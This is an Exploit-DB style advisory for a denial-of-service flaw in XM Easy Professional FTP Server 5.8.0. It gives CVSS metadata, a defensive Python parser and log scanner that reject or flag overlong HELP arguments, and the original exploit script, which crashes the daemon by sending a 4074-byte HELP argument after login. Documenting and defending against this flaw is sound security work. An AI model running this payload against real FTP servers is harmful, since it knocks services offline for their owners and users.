vendor:
XM Easy Professional FTP Server
by:
Mert SARICA
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: XM Easy Professional FTP Server
Affected Version From: 5.8.2000
Affected Version To: 5.8.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:xm_easy_professional:xm_easy_professional_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2009

XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability

After successfully logging in, sending 'HELP AAAA...' (the A repeated 4074 times) crashes the ftp daemon.

Mitigation:

Ensure that the FTP server is configured to limit the number of commands that can be sent in a single request.
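Added example, not part of this advisory or of the product: a defensive FTP control-line parser that bounds line and argument length before any command handler runs (so an overlong HELP gets a 5xx reply instead of a crash), plus a small scanner over constructed control-channel log lines that flags HELP arguments above a threshold. The limits MAX_LINE_BYTES and MAX_ARG_BYTES are assumed values, and the log format is constructed.

```python
# Assumed server limits; the only value taken from the advisory is the 4074-byte argument.
MAX_LINE_BYTES = 512      # assumed hard cap on one control-connection line
MAX_ARG_BYTES = 256       # assumed cap on a single command argument
ADVISORY_ARG_LEN = 4074   # argument length that crashes XM Easy FTP 5.8.0 per the advisory


def parse_command(raw: bytes):
    """Return (reply_code, verb, arg) for one raw control line.

    Overlong or malformed input yields a 5xx reply code with verb/arg None,
    so the daemon answers the client rather than dispatching a huge argument."""
    if len(raw) > MAX_LINE_BYTES:
        return 500, None, None            # "500 Line too long"
    line = raw.rstrip(b"\r\n")
    if not line.isascii():                # control channel is ASCII only
        return 500, None, None
    verb, _, arg = line.partition(b" ")
    verb = verb.decode("ascii").upper()
    if not (3 <= len(verb) <= 4 and verb.isalpha()):   # FTP verbs are 3-4 letters
        return 500, None, None
    if len(arg) > MAX_ARG_BYTES:
        return 501, verb, None            # "501 Argument too long"
    return 200, verb, arg.decode("ascii")


def flag_suspicious_help(log_lines, threshold=MAX_ARG_BYTES):
    """Scan constructed log entries of the form '<client> <command line>' and
    return (client, argument_length) for every HELP whose argument exceeds threshold."""
    offenders = []
    for entry in log_lines:
        client, _, command = entry.partition(" ")
        verb, _, arg = command.partition(" ")
        if verb.upper() == "HELP" and len(arg) > threshold:
            offenders.append((client, len(arg)))
    return offenders


if __name__ == "__main__":
    crash = b"HELP " + b"MS" * 2037 + b"\r\n"   # the advisory's payload: 4074-byte argument
    print(parse_command(crash))                # (500, None, None): rejected before dispatch
    print(parse_command(b"HELP SITE\r\n"))     # (200, 'HELP', 'SITE'): normal request passes
    sample_log = [                              # constructed sample entries
        "10.0.0.5 USER test",
        "10.0.0.5 HELP " + "A" * ADVISORY_ARG_LEN,
        "10.0.0.9 HELP",
    ]
    print(flag_suspicious_help(sample_log))    # [('10.0.0.5', 4074)]
```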
Source

Exploit-DB raw data:

# I discovered a denial-of-service vulnerability on XM Easy Professional
# FTP Server product.
# After successfully logging in, when you send "HELP AAAA...(4074 times)",
# ftp daemon crashes.

# -----------------------

# Exploit Title: XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability
# Date: 27.11.2009
# Author: Mert SARICA
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3

# XM Easy Professional FTP Server 5.8.0
# Denial of Service Vulnerability
# Note: FTP account is required for exploitation
# http://www.mertsarica.com

import sys
import ftplib
from ftplib import FTP

try:
    ftp = FTP('localhost')   # connect to host, default port 21
except ftplib.all_errors:
    print("Connection error")
    sys.exit(1)

try:
    ftp.login()              # user anonymous, passwd anonymous@
except ftplib.all_errors:
    print("Login failed")
    sys.exit(1)

packet = "HELP " + "MS" * 2037   # magic packet: HELP with a 4074-byte argument

try:
    ftp.sendcmd(packet)          # the daemon crashes on the overlong argument
    ftp.quit()
except ftplib.all_errors as error:   # connection drops once the server dies
    print("Very good, young padawan, but you still have much to learn...")